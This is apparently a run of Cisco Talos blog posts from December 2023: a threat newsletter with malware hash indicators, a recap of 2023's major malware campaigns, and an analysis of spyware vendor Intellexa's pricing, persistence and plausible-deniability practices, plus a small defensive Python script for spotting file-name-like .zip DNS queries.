Both groups rely on exploiting recently disclosed vulnerabilities as well as weak/default credentials. This is one of the reasons why use of valid accounts was a top MITRE ATT&CK technique observed this year, and consistently a top weakness in Talos Incident Response engagements.

Patching isn't easy, and isn't necessarily without risk. It all comes back to that balance again.

We got a question on the Reddit AMA thread that we ran earlier this week, about the difficulties of patching network infrastructure. I thought my colleague Lexi DiScola's response was such a good one I wanted to highlight it here.

The question was, "Eventually these [networking] devices may get patched, but not without a significant planned downtime, ranting from org leaders, and/or hesitation from the networking team (if there is one). Especially in larger orgs, where the number of devices may be in the hundreds or thousands. What have you observed to be the biggest barriers to patch management that you see regarding network devices?"

Here was Lexi's answer:

"One of the biggest barriers in securing these devices is that they are often not prioritized by security teams - whether that be for the reasons you listed, and/or because there is a lack of awareness around the significant level of access they can enable. As there is often limited monitoring of these devices, security teams may not even realize they are being leveraged as initial access vectors during large scale intrusions. This lack of awareness is further highlighted by the fact that many of these devices are vulnerable due to organizations using default passwords and configurations, vulnerabilities that are often quickly remediated in other network infrastructure. We recommend organizations improve monitoring and defensive measures for these devices, patch security flaws, remediate insecure default configurations, and improve employee awareness."

In terms of other recommendations based on the trends in the Year in Review Report? Well, if you thought you were about to read a blog about security recommendations without the mention of multi-factor authentication, I’m sorry to break it to you, because that’s about to happen. MFA really is one of the best things you can do to limit your threat surface.

In this episode of the Talos Takes podcast, we address the basics of implementing MFA in any environment, why any type of MFA is better than no MFA, the pitfalls of certain types of authentication, and whether going passwordless is the future. 

Read the full Year in Review below (no form filling necessary!):

Read the 2023 Cisco Talos Year in Review

A personal Year in Review to round out 2023

14 December 2023 at 19:00

As you’ve probably seen by now, Talos released our 2023 Year in Review report last week. It’s an extremely comprehensive look at the top threats, attacker trends and malware families from the past year with never-before-seen Cisco Talos telemetry. 

We have podcasts, long-form videos and even Reddit AMAs to keep you covered and make it easy to digest our major takeaways from the report. Or, just kick back with a cup of coffee and read the full report — your choice! 

With this being the last Threat Source newsletter of the calendar year, I figured I’d do a Year in Review of my own. I don’t have the data or first-hand research to back any of these statements up; this is purely vibes-based, or things I’ve discovered about myself and my cybersecurity habits over the past year. So while you may not be able to deploy any of these things on your firewall, I hope they serve as good advice to anyone thinking about the security landscape heading into the new year. 

  • Do as I say, not as I do. Before my daughter was born, I wrote in this newsletter about how I was skeptical about posting her face online and entering her personal data into various platforms while she’s so young and unable to even understand what a phone is. As soon as she was old enough to smile, I folded quickly. I’ll admit that I’ve posted her face all over Instagram, supplied her information to Gerber to enter her into the annual Gerber Baby competition (she came up short behind Maddie, apparently) and given personal information to who knows what sites while I was randomly trying to get answers to my first-time parent questions at 2 a.m. when she was getting her first tooth. None of these things are particularly smart in the long run, but as an unbiased observer, I can confidently say her cuteness on the internet only makes it a better place. 
  • Just assume your passwords are going to get out there. Several major password management services were hit with data breaches this year. And there were countless headlines about how brute-forcing password guesses led to others. The basic idea of a password manager is that your login information is inherently safer than just using the same password repeatedly, writing them down on a physical sheet of paper, or just hoping you remember each time you log in. At this point, I think it’s just safe to say that passwords are not your safest option. Passkeys and a passwordless approach to security are becoming increasingly popular, so where you can enroll in that, do it. Or if a traditional username and password combination is your only option, change that password as often as you can and make sure you have multi-factor authentication enabled to whatever password management service you use.  
  • It’s time to get off Twitter. Or X, whatever you want to call it. This platform has fully jumped the shark at this point and is rife with misinformation. The company has completely torn down any internal teams it has dedicated to fighting fake news or scams and searching for literally anything will surface misleading information, outright lies or offensive content. I miss the days when I could go to Twitter and search for a topic to get updates on a particular news item. I’m writing this on Dec. 13, and in the “Trending” sidebar on Twitter, I saw that “#cyberattack” was trending. Naturally, I wanted to see if there was an event going on I should be aware of, for obvious reasons. Instead, my results in the “Top” section included some word salad about the Bank of England targeting its own country’s critical infrastructure, a nonsensical clip from commentator Dan Bongino about woke leftists showing a cyber pandemic in a new movie, and a shocking amount of conspiracy theories about said new movie “Leave the World Behind.” It reminds me of the Michael Bluth line from “Arrested Development” when he grabs the bag out of the fridge that says, “Dead Dove DO NOT EAT.” 
  • Don’t ever assume a threat is gone forever. Over the past year, many major threat actors and malware operators that were once thought removed showed they could find a way back. The story of the FBI’s takedown of the Qakbot botnet was a major headline in August, and anyone who read the basic coverage would have thought, “Cool, don’t need to worry about those guys anymore!” However, subsequent research from Talos and other security firms found that remnants of Qakbot are still around, specifically services dedicated to sending spam. Trickbot, a major threat actor known for big game hunting, recently switched up its tactics and is actively targeting organizations in Ukraine, despite its developer being arrested and pleading guilty to several U.S. federal charges. And Emotet, which is known for its various stops-and-starts, is relatively quiet right now but was briefly active again earlier this year. This is not to say that these law enforcement server takedowns and arrests aren’t working — anything we can do to make the bad guys’ lives harder is a win in the end — but it’s continued proof that we can never really count any threat out.  

The one big thing 

Cisco Talos recently discovered a new campaign conducted by the Lazarus Group we’re calling “Operation Blacksmith,” employing at least three new DLang-based malware families, two of which are remote access trojans (RATs), where one of these uses Telegram bots and channels as a medium of command and control (C2) communications. Our latest findings indicate a definitive shift in the tactics of the infamous North Korean state-sponsored actor. 

Why do I care? 

This particular activity can be attributed to Andariel, a spinoff of the Lazarus Group. They’re actively exploiting the Log4shell vulnerability in Log4j, which is virtually everywhere. The hope is that most people have patched since the ubiquitous vulnerability was discovered in late 2021, but telemetry indicates there are many vulnerable instances still out there. Once infected, Andariel looks to install other malware loaders on the targeted machines and executes remote code that allows them to learn about the details of the system.  

So now what? 

Talos’ blog outlines the numerous ways Cisco Secure products have protections in place to defend against Operation Blacksmith and other activities from Lazarus Group. 

Top security headlines of the week 

Hundreds of Windows and Linux devices from a range of manufacturers are vulnerable to a newly discovered attack called “LogoFAIL.” The attack involves an adversary executing malicious firmware during the machines’ boot-up sequences, which means it’s difficult for traditional detection methods to block, or for users to even notice that it’s happening. The researchers who discovered this exploit wrote in their full paper that, once the attacker uses LogoFAIL to execute remote code during the Driver Execution Environment phase, it’s “game over for platform security.” Although there is no indication this type of attack has been used in the wild, it is being tracked through several CVEs. Potentially affected users should update to the latest version of UEFI by updating their firmware, including new patches from AMI, Intel, Insyde, Phoenix and Lenovo. Users can also lock down their machine’s EFI System Partition (ESP) so adversaries can’t access it, which is necessary to carry out LogoFAIL. (ArsTechnica, ZDNet)

The U.K. publicly charged Russia’s intelligence agency, the FSB, with a yearslong cyber espionage campaign targeting British government officials and other high-profile public citizens. The U.K. Foreign Office said the FSB conducted "sustained unsuccessful attempts to interfere in U.K. political processes” over several years, including stealing information relating to the country’s national elections in 2019. The alleged campaigns involved trying to breach emails belonging to politicians, journalists, activists and academics, and fake social media profiles set up to impersonate the target’s contacts. One MP in British parliament said their emails had been stolen. Several individuals belonging to a group known as Star Blizzard have been sanctioned for their connections to these activities. (BBC, Politico)

Several major hardware and software vendors released their last patches of the calendar year this week. Microsoft disclosed four critical vulnerabilities as part of its regular Patch Tuesday, three of which could lead to remote code execution. However, the total number of vulnerabilities included in December’s Patch Tuesday, 33, was the lowest in a single month since December 2019. Meanwhile on Monday, Apple released patches for its major pieces of hardware, disclosing security issues in iPhones, Macs and more. One of the vulnerabilities in macOS, CVE-2023-42914, is a kernel issue with the potential to allow apps to break out of their sandboxes. Additionally, the U.S. Cybersecurity and Infrastructure Security Agency released an advisory that attackers are actively exploiting a vulnerability in Adobe ColdFusion, which potentially poses a threat to government agencies. CVE-2023-26360 is an improper access control issue that could lead to arbitrary code execution. (Dark Reading, Talos, Security Boulevard)

Can’t get enough Talos? 

Upcoming events where you can find Talos 

NIS2 Directive: Why Organizations Must Act Now to Ensure Compliance and Security (Jan. 11, 2024, 10 a.m. GMT) 

Virtual 

The NIS2 Directive is a crucial step toward securing Europe’s critical infrastructure and essential services in an increasingly interconnected world. Organizations must act now to prepare for the new requirements, safeguard their operations, and maintain a robust cybersecurity posture. Gergana Karadzhova-Dangela from Cisco Talos Incident Response and other Cisco experts will talk about how organizations can best prepare for the coming regulations.  

Most prevalent malware files from Talos telemetry over the past week 

SHA 256: 00ab15b194cc1fc8e48e849ca9717c0700ef7ce2265511276f7015d7037d8725 
MD5: d47fa115154927113b05bd3c8a308201  
Typical Filename: mssqlsrv.exe 
Claimed Product: N/A   
Detection Name: Trojan.GenericKD.65065311 

SHA 256: 5e537dee6d7478cba56ebbcc7a695cae2609010a897d766ff578a4260c2ac9cf 
MD5: 2cfc15cb15acc1ff2b2da65c790d7551 
Typical Filename: rcx4d83.tmp 
Claimed Product: N/A   
Detection Name: Win.Dropper.Pykspa::tpd  

SHA 256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
MD5: 2915b3f8b703eb744fc54c81f4a9c67f  
Typical Filename: VID001.exe  
Claimed Product: N/A  
Detection Name: Win.Worm.Coinminer::1201 

SHA 256: 5a6b089b1d2dd66948f24ed2d9464ce61942c19e98922dd77d36427f6cded634 
MD5: 05436c22388ae10b4023b8b721729a33 
Typical Filename: BossMaster.txt 
Claimed Product: N/A 
Detection Name: PS1.malware.to.talos 

SHA 256: 975517668a3fe020f1dbb1caafde7180fd9216dcbf0ea147675ec287287f86aa 
MD5: 9403425a34e0c78a919681a09e5c16da 
Typical Filename: vincpsarzh.exe 
Claimed Product: N/A 
Detection Name: Win.Dropper.Scar::tpd

Year in Malware 2023: Recapping the major cybersecurity stories of the past year

19 December 2023 at 13:00

If there is anything the cybersecurity world learned in 2023, it’s that you can never count any bad guy out. 

Botnets kept coming back from the dead, ransomware actors found new ways to make money through data theft extortion, and threat actors and malware that have been around for more than a decade found ways to stay relevant. 

Since it seems like there's a new security threat every day making headlines, we like to take a step back at the end of every year to look back at the top stories in cybersecurity that Talos covered this year, including new research from Talos and the stories that were most interesting to readers. 

  • After Microsoft blocked macros by default in Office documents, attackers needed to find a new file format for their lure documents that could execute malware or malicious code without users noticing. To start off 2023, adversaries shifted toward Shell Link (LNK) files, which in turn gave security researchers the opportunity to capitalize on the information contained in LNK metadata. We used this data to uncover new information about the Qakbot botnet and Gamaredon threat actor, and previously unknown connections between multiple threat actors. 

  • Attackers deployed the “MortalKombat” ransomware and Laplas Clipper malware together in a campaign primarily looking to generate revenue by forcing users into paying the requested ransom. The encryption screen and ransom note associated with this campaign used images from the “Mortal Kombat” video game series — hence the name. Our research found these adversaries targeting everyone from individual users to massive organizations. 

  • The operators behind the Prometei botnet continued to level up their operations, adding new functions and anti-detection methods. Talos reported on what we identified as “version 3” of the botnet in March, including an alternative C2 domain generating algorithm (DGA), a self-updating mechanism, and a bundled version of the Apache Webserver with a web shell that’s deployed onto victim hosts. At the time of writing, the botnet had over 10,000 compromised machines. 

  • In other botnet news, the infamous Emotet malware came back online after a relatively quiet period, this time deploying malicious Microsoft Word documents as lures. Emotet is famous for going through brief periods of inactivity, often spanning months, and then re-appearing. Its newest efforts involved infection chains that Talos had not observed the operators using before. 

  • Talos discovered a new threat actor we called “YoroTrooper” targeting government and energy organizations in Azerbaijan, Tajikistan, Kyrgyzstan and other Commonwealth of Independent States (CIS) countries. YoroTrooper’s activities seem largely centered around trying to steal sensitive information from these groups. We continued to follow this group for the remainder of the year, writing about their malware and TTPs multiple times in 2023.  

  • Although it was released earlier in the year, Talos disclosed a newly discovered “V2” version of the Typhon Reborn information-stealing malware. The updated version features additional anti-analysis and anti-virtual machine (VM) capabilities to evade detection and make analysis more difficult. At the time, we predicted that Typhon Reborn would appear in future cyber attacks. 

  • A large-scale attack on global network infrastructure known as “Jaguar Tooth” goes public, including extensive reporting from Talos and Cisco. In this campaign, state-sponsored actors targeted older networking devices like wireless routers, including Cisco devices. The UK’s National Cyber Security Centre (NCSC) also released a report on a sustained campaign by a Russian intelligence agency targeting a vulnerability in routers that Cisco had published a patch for in 2017. These ongoing discussions about defending network infrastructure and ensuring organizations use up-to-date devices eventually led to Cisco and other partners co-founding the new Network Resilience Coalition in July. 

  • A new phishing-as-a-service tool called “Greatness” appears in the wild, offering attackers access to its infrastructure for a subscription fee. Greatness allows users to send spam emails, pointing targets to convincing Microsoft 365 login pages. The “as-a-service" model for threat actors had long been around, but the trend received increased attention in 2022 as several large ransomware groups shifted to new affiliate models, which offered their services and code to anyone who wanted to use it for a fee. 

  • With the help of our partners at The Citizen Lab, Talos revealed new details about the “ALIEN” and “PREDATOR” mobile spyware suites. Many groups that we called “mercenary spyware” groups use these tools to create spyware, software that is considered illegal in many countries and is often used to target at-risk individuals like politicians and activists. 

  • Talos revealed a new threat actor we called “RA Group” targeting users globally, including companies in manufacturing, wealth management, insurance providers and pharmaceuticals. RA Group uses a modified version of the Babuk ransomware, which was leaked online in September 2021. 

  • Talos discloses the details of a botnet that’s been active for nearly three full years, “Horabot.” The actor delivers a known banking trojan and spam tool onto victim machines, specifically targeting Spanish-speaking users in North and South America. At the time, Talos believed the actor behind this botnet was located in Brazil. 

  • A month after the .zip top-level domain was released for the public to register, our researchers noticed attackers using it in scams designed to get users to leak sensitive information. Because user applications increasingly treat “.zip” file names as URLs, these filenames may trigger unintended DNS queries or web requests, thereby revealing possibly sensitive or internal company data in a file’s name to any actor monitoring the associated DNS server. 
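The unintended DNS queries described in the .zip item above are something a defender can look for in their own resolver logs. The following is an added example, not Talos code and not from the original post: it scans constructed sample DNS query log lines and flags query names whose last label is a top-level domain that doubles as a common file extension. The log line format, the sample entries and the inclusion of “.mov” alongside “.zip” (another file-extension-style TLD) are assumptions made for this example; the page itself only discusses “.zip”.

```python
"""
Added example (not Talos code): flag DNS queries whose name looks like a
file name because its last label is a TLD that collides with a common file
extension (e.g. "report.zip"). Such a query may be an application
auto-linking a file name, which leaks the name to whoever runs the zone.
"""
import re
from typing import Dict, List, Optional

# TLDs that double as file extensions. ".zip" is the case discussed on the
# page; ".mov" is added here as an assumption for illustration.
FILE_EXTENSION_TLDS = {"zip", "mov"}

# Constructed sample resolver log lines (assumed format):
# "<timestamp> <client-ip> <query-type> <query-name>"
SAMPLE_DNS_LOG = """\
2023-12-19T09:01:12Z 10.0.4.21 A www.example.com
2023-12-19T09:01:15Z 10.0.4.21 A q4-financials-draft.zip
2023-12-19T09:01:19Z 10.0.4.38 A cdn.example.net
2023-12-19T09:02:02Z 10.0.4.38 A demo.mov
2023-12-19T09:02:07Z 10.0.4.52 AAAA backup_2023-12-18.zip
2023-12-19T09:02:11Z 10.0.4.52 A mail.example.com.
"""

# Four whitespace-separated fields; anything else is treated as malformed.
LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s*$")


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Parse one log line into a record, or return None if it is malformed."""
    match = LINE_RE.match(line)
    if not match:
        return None
    timestamp, client, qtype, qname = match.groups()
    return {"timestamp": timestamp, "client": client,
            "qtype": qtype, "qname": qname}


def is_filename_like(qname: str) -> bool:
    """True when the query name's last label is a file-extension-style TLD.

    A trailing dot (fully qualified form) is tolerated, and matching is
    case-insensitive because DNS names are.
    """
    labels = qname.rstrip(".").lower().split(".")
    # Need at least "<stem>.<tld>"; a bare TLD query is not a file name.
    return len(labels) >= 2 and labels[-1] in FILE_EXTENSION_TLDS


def find_suspect_queries(log_text: str) -> List[Dict[str, str]]:
    """Return the records whose query name looks like a leaked file name."""
    hits = []
    for line in log_text.splitlines():
        record = parse_line(line)
        if record is not None and is_filename_like(record["qname"]):
            hits.append(record)
    return hits


def suspect_names_by_client(log_text: str) -> Dict[str, List[str]]:
    """Group suspect query names by the client that issued them,
    which is the view an analyst wants when deciding whom to contact."""
    grouped: Dict[str, List[str]] = {}
    for record in find_suspect_queries(log_text):
        grouped.setdefault(record["client"], []).append(record["qname"])
    return grouped


if __name__ == "__main__":
    for client, names in suspect_names_by_client(SAMPLE_DNS_LOG).items():
        print(f"{client}: {', '.join(names)}")
```

In a real deployment the same check would run against resolver or passive DNS logs in whatever format they are exported in; only `parse_line` needs to change. A hit is not proof of compromise, since legitimate sites do register .zip names, but names containing underscores, dates or words like “draft” and “backup” are worth a closer look, and the grouping by client shows which hosts are leaking them.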

  • We discovered multiple versions of an undocumented malicious driver named “RedDriver,” a driver-based browser hijacker that uses the Windows Filtering Platform (WFP) to intercept browser traffic. Our research indicates that RedDriver has been active since at least 2021. This attack primarily targets Chinese-speaking users, and we suspected the creators of RedDriver are also native Chinese speakers. 

  • An unnamed actor started targeting government agencies in Ukraine and Poland, looking to steal sensitive information and setting up a backdoor for potential future attacks. Ukraine’s Computer Emergency Response Team (CERT-UA) attributed attacks, first spotted in July, to the threat actor group UNC1151, as a part of the GhostWriter operational activities allegedly linked to the Belarusian government. 

  • Talos’ Vulnerability Research team disclosed dozens of vulnerabilities that affect several small and home office (SOHO) routers. That team spent years on this research in the wake of the massive VPNFilter attack. Adversaries could exploit many of these vulnerabilities to directly access the devices, or chain them together to gain elevated access to the devices. 

  • A new attacker appeared to use a variant of the Yashma ransomware, likely to target multiple geographic areas, by mimicking WannaCry characteristics. The actor, apparently of Vietnamese origin, had been targeting users in Bulgaria, China, Vietnam and other countries since at least June. The new wrinkle to this ransomware attack is that the adversary asks the target to download the ransom note via their publicly available GitHub, rather than including the strings in the binary. 

  • The U.S. Department of Health and Human Services (HHS) released a warning to the healthcare industry about Rhysida ransomware activity. Rhysida appears to have first popped up back in May, with several high-profile compromises posted on their leak site since then, causing the U.S. government to release a specific warning alerting hospital systems and doctor’s offices about the activity. Talos released several new Snort rules to detect the Rhysida ransomware and details on the actor’s TTPs, including a new ransom note in which they pose as a legitimate cybersecurity company.  

  • Talos discloses new information about the infamous Lazarus Group APT, including several new RATs they’re using in the wild. The North Korean state-sponsored actor targeted internet infrastructure and healthcare entities in Europe and the United States with what we called “QuietRAT.” Additional research into the group found that Lazarus Group is increasingly relying on open-source tools and frameworks in the initial access phase of their attacks, as opposed to strictly employing them in the post-compromise phase.  

  • SapphireStealer, an open-source information stealer, is disclosed after Talos observed the malware across public malware repositories with increasing frequency since its initial public release in December 2022. We assessed with moderate confidence that multiple entities are using SapphireStealer and have separately improved and modified the original code base, extending it to support additional data exfiltration mechanisms and leading to the creation of several variants. 

  • Talos discovered a new malware family we called “HTTPSnoop” being deployed against telecommunications providers in the Middle East. HTTPSnoop is a simple, yet effective, backdoor that consists of novel techniques to interface with Windows HTTP kernel drivers and devices to listen to incoming requests for specific HTTP(S) URLs and execute that content on the infected endpoint. We also discovered a sister implant called “PipeSnoop,” which can accept arbitrary shellcode from a named pipe and execute it on the infected endpoint. Both tools are believed to be created and owned by the ShroudedSnooper threat actor, which built the intrusion set.  

  • Our researchers spot threat actors abusing Advanced Installer, a legitimate Windows tool used for creating software packages, to drop cryptocurrency-mining malware on infected machines. These attacks specifically target graphic designers or other artists who use computers with exceptionally large graphics cards — thus making them more valuable for cryptocurrency mining.  

  • Cloudflare and other internet hosting providers reported what was considered the largest distributed denial-of-service attack ever. Though the actual attack occurred earlier in the year, the official disclosure came in October, including details of a vulnerability in the HTTP/2 protocol that the attackers exploited. Talos released an advisory about these attacks, urging users to patch immediately and releasing new Snort rules to detect the exploitation of CVE-2023-44487. 

  • YoroTrooper, which Talos initially reported on earlier in the year, started using new TTPs, including new obfuscation techniques and the use of commodity malware. The actor is likely operating out of Kazakhstan, but these new tactics were made to look as if their lure documents came from the government of Azerbaijan.  

  • Talos disclosed a campaign by Arid Viper, a threat actor believed to be based out of Gaza. The APT used malicious apps designed as software for the Android operating system to collect sensitive information from targets and deploy additional malware onto infected devices. Although Arid Viper is believed to be based out of Gaza, Cisco Talos has no evidence indicating or refuting that this campaign is related in any way to the Israel-Hamas war, which also began in October. 

  • Talos identified the most prolific Phobos variants, common affiliate tactics, techniques and procedures (TTPs), and characteristics of the Phobos affiliate structure. Our researchers looked at observed Phobos activity and analyzed more than 1,000 Phobos samples from VirusTotal dating back to 2019. We found that the 8Base group was increasingly deploying variants of Phobos via the SmokeLoader backdoor. We also found indications that Phobos could be available as a pay-for ransomware-as-a-service model. 

  • Talos discovered a malicious campaign that likely started as early as August 2023, delivering a new remote access trojan (RAT) we dubbed “SugarGh0st.” We found evidence suggesting the threat actor is targeting the Uzbekistan Ministry of Foreign Affairs and users in South Korea. SugarGh0st is believed to be a variant of the infamous Gh0st RAT, a years-old malware of Chinese origin. 

  • Talos released the details of Project PowerUp, an effort from multiple teams across Cisco to create a new, bespoke hardware device used to protect Ukraine’s power grid. The modified IoT switches allow the country’s power grid to be protected against GPS-jamming attacks, which traditionally tried to disrupt the way timing on the network worked. CNN first wrote about these efforts, and Joe Marshall, the Talos researcher who spearheaded the project, wrote a firsthand account for the Talos blog.  

For further analysis of the threat landscape trends in 2023, download your copy of the Talos Year in Review. 

Intellexa and Cytrox: From fixer-upper to Intel Agency-grade spyware

21 December 2023 at 16:00

By Mike Gentile, Asheer Malhotra and Vitor Ventura.

Editor’s note: This blog post is a public version of a talk presented at LabsCon 2023 on Sept. 22, 2023. You can watch a recording of the talk here. Some of the intelligence presented at LabsCon was later confirmed by an Amnesty International blog post released on Oct. 6, 2023.

  • Cisco Talos has a new, in-depth analysis of timelines, operating paradigms and procedures adopted by spyware vendor Intellexa (previously known as Cytrox). 
  • Talos’ analysis revealed that rebooting an iOS or Android device may not always remove the Predator spyware produced by Intellexa. Persistence is an add-on feature provided by Intellexa for their implants and primarily depends on the licensing options chosen by a customer.
  • Intellexa knows if their customers intend to perform surveillance operations on foreign soil.
  • Two years after its first public exposure, Intellexa’s Predator/Nova spyware solution continues to be undetected by anti-virus solutions. Public reporting on Intellexa’s operations has had little to no impact on their ability to conduct and grow their business across the world.
  • Almost all publications on malicious operations conducted using Intellexa’s spyware consist primarily of malicious domains as indicators of compromise (IOCs). Talos assesses that the disclosure of such domains, managed by the customers, has little to no effect on Intellexa’s operations and enables them to preserve their malware implants due to a lack of technical disclosures. 
  • After many users patched against the exploit chains used by Intellexa as of December 2021, the spyware vendor started shipping a new exploit chain to at least one new customer in early 2022 that covered the same and more recent versions of the Android operating system.

In May 2023, Cisco Talos published the first ever in-depth technical report on Intellexa’s spyware solution named Alien and Predator, showing its inner workings and demonstrating the highly complex software architecture decisions required to make such spyware work properly on the Android operating system. This research also sheds light on several other aspects of the commercial spyware space, like plausible deniability, the impacts of widespread media exposure and recruitment issues.

During the LabsCon 2023 cyber threat intelligence conference, Talos presented the operational risks inherent to the commercial spyware landscape, using Intellexa as a use case.

This research delves into the history of the Alien/Predator line of implants, illustrating how a run-down spyware seller, Cytrox, was bought and transformed into an intelligence agency-grade spyware vendor: Intellexa.

Implants’ persistence is an add-on in Intellexa’s offering

Leaked commercial proposals from the Intellexa Alliance have shown that prices per infection are increasing every year, along with the capabilities of the company's technological solution. Rebooting the device is no longer a means to remove the implants from an infected device. 

In 2021, Predator spyware couldn’t survive a reboot on an infected Android system (it already could on iOS). However, by April 2022, that capability was being offered to their customers. Since then, no reports have been published detailing such a mechanism, but there is no reason to believe it has become obsolete. It still doesn’t survive a factory reset, but it is fair to assume that this specific capability will become available, literally breaking all trust in the device beyond recovery.

Intellexa’s product development journey

Cytrox was first created in North Macedonia in 2017, and at the time, built Android-based malware. In 2018, Cytrox was acquired by WiSpear and then in 2019 Nexa Technologies, WiSpear (and Cytrox) and Senpai Technologies teamed up to create the Intellexa Alliance, a commercial spyware company that, according to public reports, sells commercial spyware to multiple customers without regard for their potential targets and the spyware’s misuse. 

Senpai Technologies is a company specializing in OSINT and persona creation based out of Israel, while WiSpear, also based in Israel, specializes in Wi-Fi interception. Nexa Technologies (now called RB 42) is a French-based company whose main focus is remote surveillance and security services.

Immediately after the consolidation of all these firms under Intellexa in May 2019, the revamping of Predator, which at the time was their flagship spyware for Android, began. This can be confirmed by the artifacts left in the malware binary due to the use of static library compilation at build time.

By April 2020, the revamp was finished and the malware was ready to be deployed on Android. In May 2020, the developers began working on an iOS “solution” which we assess with medium confidence was a port of Alien/Predator from Android to iOS. Our assessment is based on the fact that the engine that drives the high-level components of the Predator system is similar, if not identical, to the point where some Android artifacts, detailed in the following sections, can be found on the iOS sample.

Figure: Evolution timeline

Pricing model

Building commercial spyware is a sophisticated and research-driven process. It involves meticulously circumventing, bypassing and exploiting security controls put in place by mobile applications/packages and operating systems such as Android and iOS. Combining such potent software into a package with zero- or one-click zero-day exploits makes it a highly reliable offensive “solution” – and that is exactly what makes it expensive. As early as 2016, The New York Times reported that the NSO Group charged $650,000 for every 10 infections, with an additional $500,000 for initial setup. Multi-year deals between the NSO Group and Mexico were estimated to be around $15 million – and this was back in 2013.

Fast forward five years to 2021, and another disclosure from The New York Times details the proposal brochure for Intellexa’s Predator framework offering their solution for a whopping 13.6 million Euros for:

  • 20 concurrent infections.
  • One-click exploit for initial access.
  • Predator C2 and administrative hardware and software.
  • Project plans, documentation, etc.
  • 12 months of warranty support.
Figure: Proposal (snipped) defining price and items

Leaked documents from 2022 show that the Nova platform, which is Intellexa’s data-gathering module, was priced at 8 million Euros in 2022. Price tags of 13.6 million or even 8 million Euros are hefty sums. This reinforces the fact that commercial spyware such as Intellexa’s is neither for the common man nor for petty crimeware operators. These solutions are meant for customers with deep pockets, and such expenses can only be incurred by state-sponsored agencies.

The pricing model also shows the technological evolution of the product. Based on the leaked proposal dated July 2022, Intellexa had already incorporated boot survivability into the Android solution. It also increased the support for Android to 18 months. At this point, it is unclear if this is the direct result of Intellexa’s development and research capabilities, or if it is based on acquired exploits that ultimately provide such capabilities.

The original persistence mechanism on iOS was the exploitation of the original vulnerability during the boot process by loading the malicious HTML page stored locally. The newly introduced Android persistence mechanism may simply be based on a similar method.

Plausible deniability

Intellexa’s commercial proposals are designed to create plausible deniability. These clauses extend from the infrastructure responsibilities to the delivery methods. This is a key aspect of Intellexa’s business model: the goal is to avoid a bad reputation and to claim they are not responsible for what their customers do with their “product” — they claim that they don’t even know who the victims are.

Figure: Proposal (snipped) defining responsibilities

The leaked proposals show that the infrastructure and anonymization are the responsibility of the customer. From a deniability point of view, this enables the claim that Intellexa doesn’t know how victims are being targeted. From the operational risk perspective, such clauses also shield Intellexa from any responsibility in the event of a public exposure connecting malicious operations back to the vendor.

Figure: Delivery method

The delivery of Intellexa’s supporting hardware is done at a terminal or airport. This delivery method is known as Cost Insurance and Freight (CIF), which is part of the shipping industry’s jargon (“Incoterms”). This mechanism allows Intellexa to claim that they have no visibility of where the systems are deployed and eventually located. This exact scenario was seen being put into practice when, according to a LighthouseReports investigation, Intellexa sold their solution to the Sudanese government.

Figure source: https://www.lighthousereports.com/investigation/flight-of-the-predator/

Even if we take into consideration the proposal’s terms such as “Installation and configuration at customer designated facility…” and the “Standard training course ……,” it still does not follow that Intellexa knows where the hardware is located, since everything can be done remotely, or even without their personnel knowing where the customer’s “solution” is physically located.

Intellexa does have first-hand knowledge of whether their software is being used to conduct surveillance operations targeting phone number prefixes other than their customers' country of origin and possibly their jurisdiction. This knowledge is a consequence of the licensing model. Any sale is limited to a single phone country code prefix, but for an additional fee, the customer can license the usage of the solution in additional countries without geographic limitations.

Business risks

Human resources

Commercial spyware companies don’t seem to have any kind of problem recruiting highly specialized human resources to develop their solutions. This was evidenced by the LinkedIn profiles of several highly specialized engineers. In one example, the NSO Group in June had just recruited new, highly specialized engineers from an Israeli intelligence military unit.

During the development of the iOS implant, Intellexa hired an expert iOS vulnerability researcher who had previously worked for the NSO Group for three years analyzing low-level hardware devices. The timing of the hire by Intellexa (2021 - present) indicates that the firm needed to integrate the implant with the exploit chain (including sandbox escape mechanisms) to deploy it reliably on iOS devices.

Such “experts” can be found working for, and actively hunting for jobs at, other commercial spyware vendors too. For example, a quick search by Talos showed that in September 2023 alone, the NSO Group had hired another security researcher with the same research background: this time the researcher had worked for an Israeli military intelligence unit for about three years on multiple tasks involving reverse engineering and application security.

Figure: Example of employment history

And there are several examples like that. Highly skilled researchers move from one company to another in the same line of business, supplying a constant flow of human resources as needed.

Target operating system support

New operating system releases don’t seem to make a considerable impact on the Predator solution. Intellexa now supports OS versions going back 18 months on Android and 12 months on iOS from their last supported version, which may not be the latest. Google releases approximately one new version per year, just like Apple, but Android beta versions are available months before general availability. This gives plenty of lead time to Intellexa and their exploit suppliers to develop new exploit chains to use as initial attack vectors. 

It is important to understand that the Alien/Predator implants themselves don’t need to change much between operating system releases. They are written to be as generic and modular as possible, and the modules that need to be specific to an OS version and/or capability are written in Python, which can easily be updated and deployed on the fly via a customer’s infrastructure. 

The components that are more sensitive to operating system updates are the initial access vectors and the persistence mechanisms. These capabilities often rely on exploits that can be patched or new mitigation techniques may render them useless. 

Vulnerability exploits chain patching

This is the most sensitive and least controlled part of any commercial spyware solution. One may think that patching has a high impact on the operational capability of a commercial spyware vendor, but the reality seems to be that the impact is low, or medium at most. 

Exploit brokers and exploit research companies sell full or partial exploit chains on a subscription model, where customers are entitled to workable replacements if the purchased chain is patched.

The timeline of events shows that it took Intellexa, at most, six months (probably less) to obtain and integrate a new fully operational exploit chain into their solution after their previous Android chain was patched in Nov 2021. This is confirmed by the fact that, in May 2022, their platform was being shipped to a new customer in Sudan, according to the Lighthouse report.

Overall, this demonstrates that exposing the vulnerabilities used by commercial spyware vendors, although extremely important, does not impose much of a risk on them. In fact, that risk is transferred onto the exploit brokers and vendors.

This has caught the attention of the Biden-Harris administration, to the point that the Intellexa Alliance was added to the Entity List for “...determination that the companies engaged in trafficking in cyber exploits used to gain access to information systems…” In practical terms, U.S.-based companies that deal in exploits cannot do business with the Intellexa galaxy of companies. This means that Intellexa will have to procure its exploits from companies in other regions, which for the time being doesn’t seem to be a problem. However, if the United Kingdom and the European Union take similar actions, the market will become smaller, making it much harder for these companies to acquire their initial attack vector.

The lack of impact from public exposure

The public exposure of commercial spyware companies creates awareness and has gained the attention of governments and regulating bodies. Such disclosures have also been successful at attributing malicious operations conducted by regimes against human rights activists, journalists and civilian dissidents, indicating the lack of a moral compass of many of Intellexa’s “customers.” 

